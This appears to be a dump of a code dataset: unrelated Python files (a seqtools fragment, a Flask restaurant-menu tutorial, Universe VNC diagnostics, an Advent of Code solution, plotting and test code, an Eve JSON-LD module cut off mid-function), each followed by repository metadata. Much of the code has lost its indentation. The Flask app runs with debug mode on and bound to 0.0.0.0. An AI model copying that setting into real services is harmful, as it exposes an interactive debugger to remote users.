iterators = [iter(seq) for seq in self.sequences]
i = -1
while len(iterators) > 0:
i = (i + 1) % len(iterators)
try:
yield next(iterators[i])
except StopIteration:
del iterators[i]
i -= 1
@basic_getitem
def __getitem__(self, key):
seq, idx = self._convert_1d_key(key)
return self.sequences[seq][idx]
@basic_setitem
def __setitem__(self, key, value):
seq, idx = self._convert_1d_key(key)
self.sequences[seq][idx] = value
def interleave(*sequences):
"""Interleave elements from several sequences into one.
    Sequences don't need to have the same length; cycling simply
    continues over whatever sequences are left.
.. image:: _static/interleaving.png
:alt: interleaving
:width: 30%
:align: center
Example:
>>> arr1 = [ 1, 2, 3, 4, 5]
>>> arr2 = ['a', 'b', 'c']
>>> arr3 = [.1, .2, .3, .4]
>>> list(interleave(arr1, arr2, arr3))
[1, 'a', 0.1, 2, 'b', 0.2, 3, 'c', 0.3, 4, 0.4, 5]
"""
return Interleaving(sequences)
class Repetition(object):
def __init__(self, item, times):
self.object = item
self.times = times
def __len__(self):
return self.times
def __iter__(self):
return itertools.repeat(self.object, self.times)
@basic_getitem
def __getitem__(self, item):
return self.object
@basic_setitem
def __setitem__(self, key, value):
self.object = value
class InfiniteRepetition(object):
def __init__(self, value):
self.value = value
def __iter__(self):
return itertools.repeat(self.value)
def __len__(self):
return 0
def __getitem__(self, key):
if isinstance(key, slice):
start, stop, step = key.start, key.stop, key.step
start = 0 if start is None else start
step = 1 if step is None else step
if start < 0 or stop is None or stop < 0:
raise IndexError(
"Cannot use indices relative to length on "
+ self.__class__.__name__)
if step == 0:
raise ValueError("slice step cannot be 0")
if (stop - start) * step <= 0:
return []
if step > 0:
stop += (step + stop - start) % step
else:
stop -= (-step + start - stop) % -step
return repeat(self.value, (stop - start) // step)
elif isint(key):
if key < 0:
raise IndexError(
"Cannot use indices relative to length on "
+ self.__class__.__name__)
return self.value
else:
raise TypeError(
self.__class__.__name__ + " indices must be integers or "
"slices, not " + key.__class__.__name__)
def __setitem__(self, key, value):
if isinstance(key, slice):
start, stop, step = key.start, key.stop, key.step
step = 1 if step is None else step
if start < 0 or stop is None or stop < 0:
raise IndexError(
"Cannot use indices relative to length on "
+ self.__class__.__name__)
if step == 0:
raise ValueError("slice step cannot be 0")
if (stop - start) * step > 0:
self.value = value[-1]
elif isint(key):
if key < 0:
raise IndexError(
"Cannot use indices relative to length on "
+ self.__class__.__name__)
self.value = value
else:
raise TypeError(
self.__class__.__name__ + " indices must be integers or "
"slices, not " + key.__class__.__name__)
def repeat(value, times=None):
"""Make a sequence by repeating a value.
Args:
value (Any): Value to be (virtually) replicated.
times (Optional[int]): Optional size limit.
.. image:: _static/repeat.png
:alt: repeat
:width: 10%
:align: center
Example:
>>> item = 3
>>> repetition = seqtools.repeat(item, 10)
>>> list(repetition)
[3, 3, 3, 3, 3, 3, 3, 3, 3, 3]
"""
    if isint(times) and times > 0:
return Repetition(value, times)
elif times is None:
return InfiniteRepetition(value)
else:
raise TypeError("times must be a positive integer or None")
|
mpl-2.0
| 9,185,350,080,690,769,000
| 28.076404
| 79
| 0.515341
| false
| 4.02082
| false
| false
| false
|
tuanvu216/udacity-course
|
full_stack_foundations/full_stack_foundations_master/lesson_3/15_delete_menu_item_solution/project.py
|
1
|
2369
|
from flask import Flask, render_template, request, redirect, url_for
app = Flask(__name__)
from sqlalchemy import create_engine
from sqlalchemy.orm import sessionmaker
from database_setup import Base, Restaurant, MenuItem
engine = create_engine('sqlite:///restaurantmenu.db')
Base.metadata.bind = engine
DBSession = sessionmaker(bind=engine)
session = DBSession()
@app.route('/')
@app.route('/restaurants/<int:restaurant_id>/menu')
def restaurantMenu(restaurant_id):
restaurant = session.query(Restaurant).filter_by(id = restaurant_id).one()
items = session.query(MenuItem).filter_by(restaurant_id = restaurant_id)
return render_template('menu.html', restaurant=restaurant, items = items, restaurant_id = restaurant_id)
@app.route('/restaurants/<int:restaurant_id>/new', methods=['GET','POST'])
def newMenuItem(restaurant_id):
if request.method == 'POST':
newItem = MenuItem(name = request.form['name'], description = request.form['description'], price = request.form['price'], course = request.form['course'], restaurant_id = restaurant_id)
session.add(newItem)
session.commit()
return redirect(url_for('restaurantMenu', restaurant_id = restaurant_id))
else:
return render_template('newmenuitem.html', restaurant_id = restaurant_id)
@app.route('/restaurants/<int:restaurant_id>/<int:menu_id>/edit', methods = ['GET', 'POST'])
def editMenuItem(restaurant_id, menu_id):
editedItem = session.query(MenuItem).filter_by(id = menu_id).one()
if request.method == 'POST':
if request.form['name']:
editedItem.name = request.form['name']
session.add(editedItem)
session.commit()
return redirect(url_for('restaurantMenu', restaurant_id = restaurant_id))
else:
return render_template('editmenuitem.html', restaurant_id = restaurant_id, menu_id = menu_id, item = editedItem)
#DELETE MENU ITEM SOLUTION
@app.route('/restaurants/<int:restaurant_id>/<int:menu_id>/delete', methods = ['GET','POST'])
def deleteMenuItem(restaurant_id, menu_id):
itemToDelete = session.query(MenuItem).filter_by(id = menu_id).one()
if request.method == 'POST':
session.delete(itemToDelete)
session.commit()
return redirect(url_for('restaurantMenu', restaurant_id = restaurant_id))
else:
return render_template('deleteconfirmation.html', item = itemToDelete)
if __name__ == '__main__':
app.debug = True
app.run(host = '0.0.0.0', port = 5000)
|
mit
| -4,962,088,156,317,859,000
| 36.015625
| 187
| 0.726889
| false
| 3.254121
| false
| false
| false
|
openai/universe
|
universe/envs/diagnostics.py
|
1
|
24197
|
import collections
import fastzbarlight
import itertools
import logging
from multiprocessing import pool
import numpy as np
import time
import threading
# import psutil
import sys
from collections import namedtuple
from gym.utils import reraise
import re
from universe import error, pyprofile, spaces
# TODO: prefix the loggers
logger = logging.getLogger(__name__)
extra_logger = logging.getLogger('universe.extra.'+__name__)
def show(ob):
from PIL import Image
Image.fromarray(ob).show()
def standard_error(ary, axis, scale=1):
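    # Standard error of the mean along `axis`: samples are rescaled by
    # `scale`, then np.std (population std, ddof=0) is divided by
    # sqrt(n - 1) when more than one sample is available.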
ary = np.array(ary) * scale
if len(ary) > 1:
return np.std(ary, axis=axis) / np.sqrt(len(ary) - 1)
else:
return np.std(ary, axis=axis)
def extract_timestamp(observation):
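    # Reading of the encoding (inferred from the decoders below): the
    # timestamp spans two adjacent pixels, i.e. two 3-byte RGB triplets,
    # combined big-endian into a single integer of milliseconds and
    # returned as seconds.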
total = 0
for byte in observation[0]:
total = 256 * total + byte
for byte in observation[1]:
total = 256 * total + byte
timestamp = total/1000.
return timestamp
class MetadataDecoder(object):
@classmethod
def build(cls, metadata_encoding, pool, qr_pool, label):
metadata_encoding = metadata_encoding.copy()
type = metadata_encoding.pop('type')
if type == 'qrcode':
return QRCodeMetadataDecoder(label=label, pool=pool, qr_pool=qr_pool, **metadata_encoding)
elif type == 'pixels':
return PixelsMetadataDecoder(label=label)
else:
raise error.Error('Invalid encoding: {}'.format(type))
class AsyncDecode(object):
pool = None
def __init__(self, pool, qr_pool, method, x, y, width, height):
self.x = x
self.y = y
self.width = width
self.height = height
self._last_img = None
self.method = method
self.results = []
self.deque = collections.deque()
self.pool = pool
self.qr_pool = qr_pool
def __call__(self, img, available_at):
# Choose the return value
if len(self.deque) > 0 and self.deque[0].ready():
last = self.deque.popleft()
res = last.get()
if res is not None:
pyprofile.timing('vnc_env.diagnostics.async_decode.latency', time.time() - res['available_at'])
else:
res = False
pyprofile.gauge('vnc_env.diagnostics.async_decode.queue_depth', len(self.deque))
# Just grayscale it by keeping only one component. Should be
# good enough as this region is black and white anyway.
grayscale = img[self.y:self.y+self.height, self.x:self.x+self.width, 0]
# Apply processing if needed
match = np.array_equal(self._last_img, grayscale)
if not match:
pyprofile.incr('vnc_env.diagnostics.async_decode.schedule')
# sneakily copy if numpy hasn't, so it can be cached
self._last_img = np.ascontiguousarray(grayscale)
async = self.qr_pool.apply_async(self.method, (self._last_img, time.time(), available_at))
self.deque.append(async)
else:
pyprofile.incr('vnc_env.diagnostics.async_decode.cache_hit')
return res
class QRCodeMetadataDecoder(MetadataDecoder):
def __init__(self, pool, qr_pool, x, y, width, height, label):
self.flag_synchronous = False
self.x = x
self.y = y
self.width = width
self.height = height
self.label = label
self.decode = AsyncDecode(pool, qr_pool, self._decode, x, y, width, height)
def _decode(self, observation, start, available_at):
# This method gets wrapped by AsyncDecode.__call__
with pyprofile.push('vnc_env.diagnostics.QRCodeMetadataDecoder.qr_code_scanner'):
encoded = fastzbarlight.qr_code_scanner(observation.tobytes(), self.width, self.height)
if encoded is None:
# Failed to parse!
return
if encoded.startswith(b'v1:'):
encoded = encoded.decode('utf-8')
if len(encoded) != len('v1:') + 12 + 12:
                raise error.Error('Bad length for metadata from environment: {}'.format(encoded))
encoded = encoded[len('v1:'):]
last_update = int(encoded[:12], 16) / 1000.0
last_action = int(encoded[12:24], 16) / 1000.
return {
# Timestamp on the image
'now': last_update,
# When the last probe was received
'probe_received_at': last_action,
'processing_start': start,
'processing_end': time.time(),
'available_at': available_at,
}
else:
raise error.Error('Bad version string for metadata from environment: {}'.format(encoded))
class PixelsMetadataDecoder(MetadataDecoder):
def __init__(self, label):
self.flag_synchronous = True
self.anchor = np.array([
[(0x12, 0x34, 0x56), (0x78, 0x90, 0xab)],
[(0x23, 0x45, 0x67), (0x89, 0x0a, 0xbc)],
], dtype=np.uint8)
self.location = None
self.last_search_metadata = 0
self.label = label
def _check_location(self, observation, location):
y, x = location
return np.all(observation[y:y+2, x:x+2] == self.anchor)
def _find_metadata_location(self, observation):
ys, xs = np.where(np.all(observation == self.anchor[0, 0], axis=-1))
if len(ys) == 0:
extra_logger.info('[%s] Could not find metadata anchor pixel', self.label)
return False
# TODO: handle multiple hits
assert len(ys) == 1
location = (ys[0], xs[0])
assert self._check_location(observation, location)
extra_logger.info('[%s] Found metadata anchor pixel: %s', self.label, location)
return location
def _should_search_metadata(self):
return time.time() - self.last_search_metadata > 1
def decode(self, observation, available_at=None):
start = time.time()
# metadata pixel location hasn't been initialized or it has moved
if not self.location or not self._check_location(observation,
self.location):
# only search for metadata occasionally
if self._should_search_metadata():
self.location = self._find_metadata_location(observation)
self.last_search_metadata = time.time()
if not self.location:
return False # False translates to None in DiagnosticsInstance
y, x = self.location
now = extract_timestamp(observation[y, x+2:x+4])
probe_received_at = extract_timestamp(observation[y, x+4:x+6])
return {
'now': now,
'probe_received_at': probe_received_at,
'processing_start': start,
'processing_end': time.time(),
'available_at': available_at,
}
class Diagnostics(object):
def __init__(self, n, probe_key, ignore_clock_skew=False, metadata_encoding=None, disable_action_probes=False):
# Each QR code takes about 1ms (and updates at 5fps). We do
# our best to ensure the QR is processed in time for the next
# step call (n/16 would put us right at the threshold).
self.pool = pool.ThreadPool(max(int(n/4), 1))
self.qr_pool = pool.ThreadPool(max(int(n/8), 1))
self.lock = threading.RLock()
self.instance_n = [None] * n
self.ignore_clock_skew = ignore_clock_skew
self.disable_action_probes = disable_action_probes
self.metadata_encoding = metadata_encoding
self.update(probe_key=probe_key, metadata_encoding=metadata_encoding)
# only used in flashgames right now
def update(self, probe_key, metadata_encoding):
self.probe_key = probe_key
self.metadata_encoding = metadata_encoding
for instance in self.instance_n:
if instance is not None:
instance.update(probe_key=self.probe_key, metadata_encoding=self.metadata_encoding)
def connect(self, i, network=None, label=None):
# This should technically be synchronized
self.instance_n[i] = DiagnosticsInstance(i, network, self.probe_key, self.ignore_clock_skew, self.metadata_encoding, disable_action_probes=self.disable_action_probes, qr_pool=self.qr_pool, pool=self.pool, label=label)
def close(self, i=None):
if i is not None:
self.instance_n[i] = None
else:
self.pool.close()
self.qr_pool.close()
for i in range(len(self.instance_n)):
self.close(i)
self.instance_n = None
def add_probe(self, action_n, mask_n):
if self.disable_action_probes or self.instance_n is None:
return
for instance, action, mask in zip(self.instance_n, action_n, mask_n):
# Important that masking prevents us from adding probes. (This
# avoids us e.g. filling in backticks into text boxes as the
# environment boots.)
if mask and instance:
instance.add_probe(action)
def add_metadata(self, observation_n, info_n, available_at=None):
"""Mutates the info_n dictionary."""
if self.instance_n is None:
return
with pyprofile.push('vnc_env.diagnostics.Diagnostics.add_metadata'):
async = self.pool.imap_unordered(
self._add_metadata_i,
zip(self.instance_n, observation_n, info_n, [available_at] * len(observation_n)))
list(async)
def _add_metadata_i(self, args):
instance, observation, info, now = args
if instance is None or observation is None:
return
instance.add_metadata(observation, info, now)
def extract_metadata(self, observation_n):
return [instance._extract_metadata(observation)
for instance, observation in zip(self.instance_n, observation_n)]
def clear_probes_when_done(self, done_n):
if self.instance_n is None: # if we've been closed there's nothing to do
return
for instance, done in zip(self.instance_n, done_n):
if done:
instance.clear_probe()
class DiagnosticsInstance(object):
anchor = np.array([
[(0x12, 0x12, 0x12), (0x78, 0x78, 0x78)],
[(0x23, 0x23, 0x23), (0x89, 0x89, 0x89)],
], dtype=np.uint8)
zero_clock_skew = np.zeros([2])
def __init__(self, i, network, probe_key, ignore_clock_skew, metadata_encoding, disable_action_probes, pool, qr_pool, label=None):
'''
        network - either a Network() object used to get clock skew, or None.
If None, we skip measuring clock skew, and skip measuring
diagnostics which rely on clock skew.
'''
if network is None:
assert ignore_clock_skew
self.ignore_clock_skew = ignore_clock_skew
self.label = label
self.i = i
self.network = network
self.probe_sent_at = None # local time
self.probe_received_at = None # remote time
self.action_latency_skewed = None
self.last_observation_timestamp = None
self.disable_action_probes = disable_action_probes
self.pool = pool
self.qr_pool = qr_pool
self.could_read_metadata = None
self.update(probe_key=probe_key, metadata_encoding=metadata_encoding)
def update(self, probe_key, metadata_encoding):
self.probe = [
spaces.KeyEvent(probe_key, down=True).compile(),
spaces.KeyEvent(probe_key, down=False).compile(),
]
if metadata_encoding is not None:
self.metadata_decoder = MetadataDecoder.build(metadata_encoding, pool=self.pool, qr_pool=self.qr_pool, label=self.label)
else:
self.metadata_decoder = None
def clear_probe(self):
self.probe_sent_at = None
self.probe_received_at = None
def add_probe(self, action):
if self.network is not None and not self.network.active():
return
if self.probe_sent_at is not None and self.probe_sent_at + 10 < time.time():
extra_logger.warn('[%s] Probe to determine action latency timed out (was sent %s). (This is harmless, but worth knowing about.)', self.label, self.probe_sent_at)
self.probe_sent_at = None
if self.probe_sent_at is None:
extra_logger.debug('[%s] Sending out new action probe: %s', self.label, self.probe)
self.probe_sent_at = time.time()
action += self.probe
assert self.probe_sent_at is not None
def add_metadata(self, observation, info, available_at=None):
"""Extract metadata from a pixel observation and add it to the info
"""
observation = observation['vision']
if observation is None: return
if self.network is not None and not self.network.active():
return
elif self.metadata_decoder is None:
return
elif observation is None:
return
# should return a dict with now/probe_received_at keys
with pyprofile.push('vnc_env.diagnostics.DiagnosticsInstance.add_metadata.decode'):
metadata = self.metadata_decoder.decode(observation, available_at=available_at)
if metadata is False:
            # No metadata ready yet (decode pending or unchanged frame); this does not mean parsing failed
metadata = None
elif metadata is None:
if self.could_read_metadata:
self.could_read_metadata = False
extra_logger.info('[%s] Stopped being able to read metadata (expected when environment resets)', self.label)
elif not self.could_read_metadata:
self.could_read_metadata = True
extra_logger.info('[%s] Started being able to read metadata', self.label)
if self.metadata_decoder.flag_synchronous and metadata is not None:
info['diagnostics.image_remote_time'] = metadata['now']
local_now = time.time()
if self.network is None:
            # Assume the clock skew is zero. This should only be run on the
            # same machine as the VNC server, such as the universe
            # instance inside the environment containers.
real_clock_skew = self.zero_clock_skew
else:
# Note: this is a 2-length vector of (min, max), so anything added to
# it is also going to be a 2-length vector.
# Most of the diagnostics below are, but you have to look carefully.
real_clock_skew = self.network.reversed_clock_skew()
# Store real clock skew here
info['stats.gauges.diagnostics.clock_skew'] = real_clock_skew
if self.ignore_clock_skew:
clock_skew = self.zero_clock_skew
else:
clock_skew = real_clock_skew
if metadata is not None:
# We'll generally update the observation timestamp infrequently
if self.last_observation_timestamp == metadata['now']:
delta = None
else:
# We just got a new timestamp in the observation!
self.last_observation_timestamp = metadata['now']
observation_now = metadata['now']
delta = observation_now - metadata['available_at']
# Subtract *local* time it was received from the *remote* time
# displayed. Negate and reverse order to fix time ordering.
info['stats.gauges.diagnostics.lag.observation'] = -(delta + clock_skew)[[1, 0]]
# if self.network is None:
# # The rest of diagnostics need the network, so we're done here
# return
probe_received_at = metadata['probe_received_at']
if probe_received_at == 0 or self.disable_action_probes:
# Happens when the env first starts
self.probe_received_at = None
elif self.probe_received_at is None: # this also would work for the equality case
self.probe_received_at = probe_received_at
elif self.probe_received_at != probe_received_at and self.probe_sent_at is None:
logger.info('[%s] Probe is marked as received at %s, but probe_sent_at is None. This is surprising. (HINT: do you have multiple universe instances talking to the same environment?)', self.label, probe_received_at)
elif self.probe_received_at != probe_received_at:
extra_logger.debug('[%s] Next probe received: old=%s new=%s', self.label, self.probe_received_at, probe_received_at)
self.probe_received_at = probe_received_at
# Subtract the *local* time we sent it from the *remote* time it was received
self.action_latency_skewed = probe_received_at - self.probe_sent_at
self.probe_sent_at = None
if self.action_latency_skewed:
action_lag = self.action_latency_skewed + clock_skew
self.action_latency_skewed = None
else:
action_lag = None
info['stats.gauges.diagnostics.lag.action'] = action_lag
local_now = time.time()
# Look at when the remote believed it parsed the score (not
# all envs send this currently).
#
        # Also, if we received no new rewards, then this value is
# None. This could indicate a high reward latency (bad,
# uncommon), or that the agent is calling step faster than new
# rewards are coming in (good, common).
remote_score_now = info.get('rewarder.lag.observation.timestamp')
if remote_score_now is not None:
delta = remote_score_now - local_now
info['stats.gauges.diagnostics.lag.reward'] = -(delta + clock_skew)[[1, 0]]
# Look at when the remote send the message, so we know how
# long it's taking for messages to get to us.
rewarder_message_now = info.get('reward_buffer.remote_time')
if rewarder_message_now:
delta = rewarder_message_now - local_now
info['stats.gauges.diagnostics.lag.rewarder_message'] = -(delta + clock_skew)[[1, 0]]
def extract_n_m(dict_n_m, key):
output = []
for dict_n in dict_n_m:
layer = []
for dict in dict_n:
layer.append(dict[key])
output.append(layer)
return np.array(output)
# class ChromeProcessInfo(object):
# proc_regex = re.compile('.*(chrome|Chrome|nacl_helper).*')
# def add_system_stats(self, info, now):
#         """TODO: This needs to be moved to universe-envs and run there. Otherwise it only works if the env and agent
# are on the same machine. In addition a new rpc call, rpc.env.diagnostics, should be added to return
# data to the agent periodically.
# """
# start = time.time()
# # CPU
# cpu_percent = psutil.cpu_percent()
# info['diagnostics.env.cpu.percent'] = cpu_percent
# cpu_cores_percent = psutil.cpu_percent(percpu=True)
# num_cores = len(cpu_cores_percent)
# info['diagnostics.env.cpu.percent.all_cores'] = cpu_percent / num_cores
# info['diagnostics.env.cpu.percent.each_core'] = cpu_cores_percent
# info['diagnostics.env.cpu.num_cores'] = num_cores
# # MEMORY
# mem = psutil.virtual_memory()
# info['diagnostics.env.memory.percent'] = mem.percent
# info['diagnostics.env.memory.total'] = mem.total
# info['diagnostics.env.memory.available'] = mem.available
# # NETWORK
# if self.last_measured_at is not None:
# elapsed_ms = (now - self.last_measured_at) * 1000.
# current = psutil.net_io_counters()
# dl = (current.bytes_recv - self.system_network_counters.bytes_recv) / elapsed_ms
# ul = (current.bytes_sent - self.system_network_counters.bytes_sent) / elapsed_ms
# info['diagnostics.env.network.download_bytes_ps'] = dl * 1000.
# info['diagnostics.env.network.upload_bytes_ps'] = ul * 1000.
# self.system_network_counters = current
# # CHROME
# if self.chrome_last_measured_at is None or (time.time() - self.chrome_last_measured_at) > 30:
# # Fetch every 30 seconds
# self.chrome_last_measured_at = time.time()
# logger.info("Measuring Chrome process statistics")
# chrome_info = ChromeProcessInfo()
# chrome_info = best_effort(chrome_info.fetch, num_cores)
# if chrome_info is not None:
# self.chrome_info = chrome_info
# if self.chrome_info is not None:
# self._populate_chrome_info(self.chrome_info, info)
# # TODO: Add GPU stats
# pyprofile.push('diagnostics.system_stats')
# def _populate_chrome_info(self, chrome_info, info):
# pyprofile.push('diagnostics.chrome_process_info.process_iter')
# pyprofile.push('diagnostics.chrome_process_info.total')
# info['diagnostics.chrome.age'] = chrome_info.age
# info['diagnostics.chrome.cpu.time'] = chrome_info.cpu_time
# info['diagnostics.chrome.cpu.percent'] = chrome_info.cpu_percent
# info['diagnostics.chrome.cpu.percent.all_cores'] = chrome_info.cpu_percent_all_cores
# info['diagnostics.chrome.cpu.percent.all_cores_all_time'] = chrome_info.cpu_percent_all_cores_all_time
# info['diagnostics.chrome.num_processes'] = len(chrome_info.processes)
# def __init__(self):
# self.cpu_time = 0.
# self.cpu_percent = 0.
# self.min_create_time = None
# self.visited_pids = set()
# self.processes = []
# self.time_to_get_procs = None
# self.total_time_to_measure = None
# self.age = None
# self.cpu_percent_all_cores_all_time = None
# self.cpu_percent_all_cores = None
# def fetch(self, num_cores):
# start = time.time()
# start_process_iter = time.time()
# procs = list(psutil.process_iter())
# self.time_to_get_procs = time.time() - start_process_iter
# for proc in procs:
# try:
# name = proc.name()
# if self.proc_regex.match(name):
# self._fetch_single(proc, name)
# # N.B. Don't read children. defunct processes make this take 4ever.
# # Child processes are all uncovered by initial scan.
# except (psutil.AccessDenied, psutil.NoSuchProcess) as e:
# pass
# self.total_time_to_measure = time.time() - start
# if self.min_create_time is None:
# self.age = 0
# else:
# self.age = time.time() - self.min_create_time
# self.cpu_percent_all_cores_all_time = 100. * self.cpu_time / (self.age * num_cores)
# self.cpu_percent_all_cores = self.cpu_percent / num_cores
# return self
# def _fetch_single(self, proc, name):
# if proc.pid in self.visited_pids:
# return
# try:
# cpu_times = proc.cpu_times()
# cpu_percent = proc.cpu_percent()
# created = proc.create_time()
# if self.min_create_time is None:
# self.min_create_time = created
# else:
# self.min_create_time = min(created, self.min_create_time)
# cpu_time = cpu_times.user + cpu_times.system
# proc_info = namedtuple('proc_info', 'name cpu_time cpu_percent created age')
# proc_info.name = name
# proc_info.cpu_time = cpu_time
# proc_info.cpu_percent = cpu_percent
# proc_info.created = created
# proc_info.age = time.time() - created
# proc_info.pid = proc.pid
# self.processes.append(proc_info)
# # Totals
# self.cpu_time += cpu_time
# self.cpu_percent += cpu_percent
# self.visited_pids.add(proc.pid)
# except (psutil.AccessDenied, psutil.NoSuchProcess) as e:
# pass
|
mit
| 3,990,940,570,749,999,000
| 40.081494
| 229
| 0.598008
| false
| 3.795013
| false
| false
| false
|
ujjwalgulecha/AdventOfCode
|
2015/Day_18/Part_1.py
|
1
|
1072
|
from copy import copy, deepcopy
lights = []
with open("Day_18.input") as f:
for line in f:
data = line.strip()
light_temp = list(data)
lights.append(light_temp)
def getNeighbours(j, k, lights):
dx = [0, 1, -1]
dy = [0, 1, -1]
neighbours = 0
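	# Count the 8 Moore neighbours that are on; the (x or y) guard skips
	# the (0, 0) offset so a cell never counts itself. The grid is assumed
	# square (100x100 here), since j is bounds-checked against
	# len(lights[0]) but used as the first index into lights.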
for x in dx:
for y in dy:
if j+x >= 0 and j+x < len(lights[0]) and k+y >= 0 and k+y < len(lights):
if lights[j+x][k+y] == on and (x or y):
neighbours+=1
return neighbours
def number_of_lights_on():
return sum(1 for i in xrange(len(lights[0])) for j in xrange(len(lights)) if lights[i][j] == on)
iterations = 100
on = '#'
off = '.'
for i in xrange(iterations):
temp_lights = deepcopy(lights)
for j in xrange(len(lights[0])):
for k in xrange(len(lights)):
neighbours = getNeighbours(j, k, lights)
if lights[j][k] == off:
if neighbours == 3:
temp_lights[j][k] = on
else:
temp_lights[j][k] = off
else:
if neighbours == 2 or neighbours == 3:
temp_lights[j][k] = on
else:
temp_lights[j][k] = off
lights = deepcopy(temp_lights)
print number_of_lights_on()
|
mit
| -6,348,467,895,201,080,000
| 22.844444
| 97
| 0.608209
| false
| 2.504673
| false
| false
| false
|
breedlun/clearplot
|
doc/source/examples/curve_and_image_sequence/curve_and_image_sequence.py
|
1
|
1576
|
# -*- coding: utf-8 -*-
"""
Created on Sat Apr 18 15:43:55 2015
@author: Ben
"""
import clearplot.plot_functions as pf
import matplotlib.pyplot
import os
import numpy as np
#Load global response
data_dir = os.path.join(os.path.dirname(pf.__file__), os.pardir, 'doc', \
'source', 'data')
path = os.path.join(data_dir, 's140302C-mechanical_response.csv')
data = np.loadtxt(path, delimiter = ',')
#Specify the indices of the field images to be plotted
ndx_list = [0, 85, 141, 196, 252]
#Specify the column indices to crop the images to
cols = range(470,470+340)
#Load the field images into an image sequence list
im_seq = []
for ndx in ndx_list:
#Load field image
im_filename = 's140302C-eqps_field-frame_%r.png' %(ndx)
im_path = os.path.join(data_dir, 'hi-rez_field_images', im_filename)
im = matplotlib.pyplot.imread(im_path)
#Crop the field image and add to list
im_seq.append(im[:,cols,:])
#Create labels
labels = []
for i in range(1, len(ndx_list) + 1):
labels.append(str(i))
#Plot curve
[fig, ax, curves] = pf.plot('', data[:,0], data[:,1], \
x_label = ['\varepsilon', '\%'], y_label = ['\sigma', 'GPa'])
ax.label_curve(curves[0], labels, ndx = ndx_list, angles = 60)
ax.plot_markers(data[ndx_list,0], data[ndx_list,1], colors = [0,0,0])
fig.save('curve_and_image_sequence-a.png');
#Plot image sequence
[fig, ax, im_obj] = pf.show_im('curve_and_image_sequence-b.png', \
im_seq, scale_im = 0.3, c_label = ['\bar{\varepsilon}^p', '\%'], \
c_lim = [0, 100], c_tick = 25, b_labels = True, im_interp = 'bicubic', \
c_bar = True);
|
mit
| -1,595,391,377,537,425,700
| 34.044444
| 76
| 0.647843
| false
| 2.703259
| false
| false
| false
|
uw-it-aca/spotseeker_server
|
spotseeker_server/test/spot_caching.py
|
1
|
1190
|
# Copyright 2021 UW-IT, University of Washington
# SPDX-License-Identifier: Apache-2.0
from django.test import TestCase
from django.core.cache import cache
from spotseeker_server.models import Spot
class SpotCacheTest(TestCase):
def test_spot_caching(self):
spot = Spot.objects.create(name='foo')
spot_id = spot.pk
# Assert that a cache entry is created when we call
# json_data_structure()
js = spot.json_data_structure()
cached_js = cache.get(spot.json_cache_key())
self.assertEqual(js, cached_js)
# Assert that saving the spot removes the cache entry
spot.save()
self.assertNotIn(spot_id, cache)
# Assert that the spot now has a new etag
new_js = spot.json_data_structure()
self.assertNotEqual(js['etag'], new_js['etag'])
self.assertEqual(new_js['etag'], spot.etag)
# Assert the new cache entry reflects the updated etag
new_cached_js = cache.get(spot.json_cache_key())
self.assertEqual(new_js, new_cached_js)
# Assert that deleting the spot removes the cache entry
spot.delete()
self.assertNotIn(spot_id, cache)
|
apache-2.0
| -5,387,262,768,862,895,000
| 31.162162
| 63
| 0.652941
| false
| 3.801917
| false
| false
| false
|
restful-open-annotation/eve-restoa
|
oaeve.py
|
1
|
13383
|
#!/usr/bin/env python
"""Open Annotation JSON-LD support functions for Eve."""
__author__ = 'Sampo Pyysalo'
__license__ = 'MIT'
import json
import urlparse
import hashlib
import re
import flask
import mimeparse
import oajson
import seqid
from settings import TARGET_RESOURCE
# whether to expand @id values to absolute URLs
ABSOLUTE_ID_URLS = True
# mapping from Eve JSON keys to JSON-LD ones
jsonld_key_rewrites = [
('_id', '@id'),
]
eve_to_jsonld_key_map = dict(jsonld_key_rewrites)
jsonld_to_eve_key_map = dict([(b,a) for a,b in jsonld_key_rewrites])
def dump_json(document, prettyprint=True):
if not prettyprint:
return json.dumps(document)
else:
return json.dumps(document, indent=2, sort_keys=True,
separators=(',', ': '))+'\n'
def setup_callbacks(app):
# annotations
app.on_pre_POST_annotations += convert_incoming_jsonld
app.on_pre_PUT_annotations += convert_incoming_jsonld
app.on_post_GET_annotations += convert_outgoing_jsonld
app.on_post_PUT_annotations += convert_outgoing_jsonld
app.on_post_POST_annotations += convert_outgoing_jsonld
# annotations by document (separate Eve endpoint)
app.on_post_GET_annbydoc += convert_outgoing_jsonld
app.on_post_GET_annbydoc += rewrite_annbydoc_ids
# documents
app.on_post_GET_documents += rewrite_outgoing_document
# TODO: this doesn't seem to be firing, preventing the use of ETag
# in HEAD response to avoid roundtrips.
app.on_post_HEAD_documents += rewrite_outgoing_document
def eve_to_jsonld(document):
document = oajson.remap_keys(document, eve_to_jsonld_key_map)
if ABSOLUTE_ID_URLS:
ids_to_absolute_urls(document)
oajson.add_context(document)
oajson.add_types(document)
remove_meta(document)
remove_status(document)
remove_target_resources(document)
rewrite_links(document)
return document
def eve_from_jsonld(document):
document = oajson.remap_keys(document, jsonld_to_eve_key_map)
# TODO: invert ids_to_absolute_urls() here
oajson.normalize(document)
oajson.remove_context(document)
oajson.remove_types(document)
add_target_resources(document)
return document
def add_target_resources(document):
"""Add fragmentless target URL values to make search easier."""
if oajson.is_collection(document):
for item in document.get(oajson.ITEMS, []):
add_target_resources(item)
else:
target = document.get('target')
if target is None:
return
assert TARGET_RESOURCE not in document
# TODO: support multiple and structured targets
if not isinstance(target, basestring):
raise NotImplementedError('multiple/structured targets')
document[TARGET_RESOURCE] = urlparse.urldefrag(target)[0]
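# Illustrative note (added for clarity, not in the original module):
# urlparse.urldefrag() splits a URL into (url, fragment), e.g.
#   urlparse.urldefrag('http://ex.org/doc.txt#char=0,10')
#   == ('http://ex.org/doc.txt', 'char=0,10')
# so TARGET_RESOURCE stores the fragmentless document URL, which makes
# "all annotations on this document" searches a simple equality match.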
def remove_target_resources(document):
"""Remove fragmentless target URL values added to make search easier."""
if oajson.is_collection(document):
for item in document.get(oajson.ITEMS, []):
remove_target_resources(item)
else:
try:
del document[TARGET_RESOURCE]
except KeyError:
pass
def is_jsonld_response(response):
"""Return True if the given Response object should be treated as
JSON-LD, False otherwise."""
# TODO: reconsider "application/json" here
return response.mimetype in ['application/json', 'application/ld+json']
def convert_outgoing_jsonld(request, payload):
"""Event hook to run after executing a GET method.
Converts Eve payloads that should be interpreted as JSON-LD into
the Open Annotation JSON-LD representation.
"""
if not is_jsonld_response(payload):
return
doc = json.loads(payload.get_data())
jsonld_doc = eve_to_jsonld(doc)
payload.set_data(dump_json(jsonld_doc))
def _collection_ids_to_absolute_urls(document):
"""Rewrite @id values from relative to absolute URL form for collection."""
base = flask.request.base_url
# Eve responds to both "collection" and "collection/" variants
